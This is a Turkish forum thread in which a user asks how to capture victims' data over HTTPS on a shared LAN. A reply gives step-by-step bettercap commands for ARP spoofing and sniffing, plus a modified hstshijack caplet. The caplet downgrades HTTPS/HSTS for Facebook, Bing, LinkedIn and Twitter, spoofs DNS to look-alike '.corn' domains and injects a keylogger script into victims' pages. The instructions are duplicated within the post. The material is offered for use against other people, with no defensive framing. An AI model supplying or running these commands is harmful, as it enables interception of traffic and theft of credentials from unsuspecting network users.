Başlıkta da belirttiğim gibi man in the middle attack yaparken, aynı LAN'a bağlı olanları Https olmasına rağmen kurbanların bilgilerini toplayabilir miyiz?
Https & SSL sertifikası geçilebilir mi?
- Konuyu başlatan NightMare82
- Başlangıç tarihi
evet yapabilirsiniz hstsh olan siteleri bile kırabilirsiniz ben bettercap kullanıyorum https yi http downgrade yapabiliyor fakat her zaman çalışmıyor bazen çalışıyor
bettercap -iface wlan0
eth0 veya wlan0 seçersin birini
net.probe on sonra net.show diyorsun karşına wifi'ına bağlı kişiler çıkıyor
set arp.spoof.dublex true
set arp.spoof.targets 192.168.1.1 (ip adresi örnek birden fazla seçmek için 192.168.1.1,192.168.1.2 virgül koy)
arp.spoof on
net.sniff on (bunu açtığın an bilgiler düşmeye başlar)
ek olarak hstsh siteleri kırmayı göstereceğim ama gerekli durumlar oluştuğu zaman çalışır.
hstshijack/hstshijack deyince çalışır fakat çalışmıyor ben sana çalışan kodu vereyim.
cd /usr/share/bettercap/caplets/hstshijack (burada hstshijack.cap dosyası olması lazım bulursun)
hepsini sil içine şu kodları yaz
hstshijack/hstshijack
çalıştır.
bettercap -iface wlan0
eth0 veya wlan0 seçersin birini
net.probe on sonra net.show diyorsun karşına wifi'ına bağlı kişiler çıkıyor
set arp.spoof.dublex true
set arp.spoof.targets 192.168.1.1 (ip adresi örnek birden fazla seçmek için 192.168.1.1,192.168.1.2 virgül koy)
arp.spoof on
net.sniff on (bunu açtığın an bilgiler düşmeye başlar)
ek olarak hstsh siteleri kırmayı göstereceğim ama gerekli durumlar oluştuğu zaman çalışır.
hstshijack/hstshijack deyince çalışır fakat çalışmıyor ben sana çalışan kodu vereyim.
cd /usr/share/bettercap/caplets/hstshijack (burada hstshijack.cap dosyası olması lazım bulursun)
hepsini sil içine şu kodları yaz
Kod:
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets facebook.com, *.facebook.com, *.bing.com, bing.com, [url]www.linkedin.com[/url], twitter.com
set hstshijack.replacements facebook.corn, *.facebook.corn,*.bing.corn, bing.corn, linkedin.com, twitter.corn
#set hstshijack.blockscripts facebook.com,*.facebook.com
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/root/atil.js
set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains facebook.corn, *.facebook.corn,*.bing.corn, bing.corn, linkedin.com, twitter.corn
http.proxy on
dns.spoof onhstshijack/hstshijack
çalıştır.
+ 
)
)
Moderatör tarafında düzenlendi:
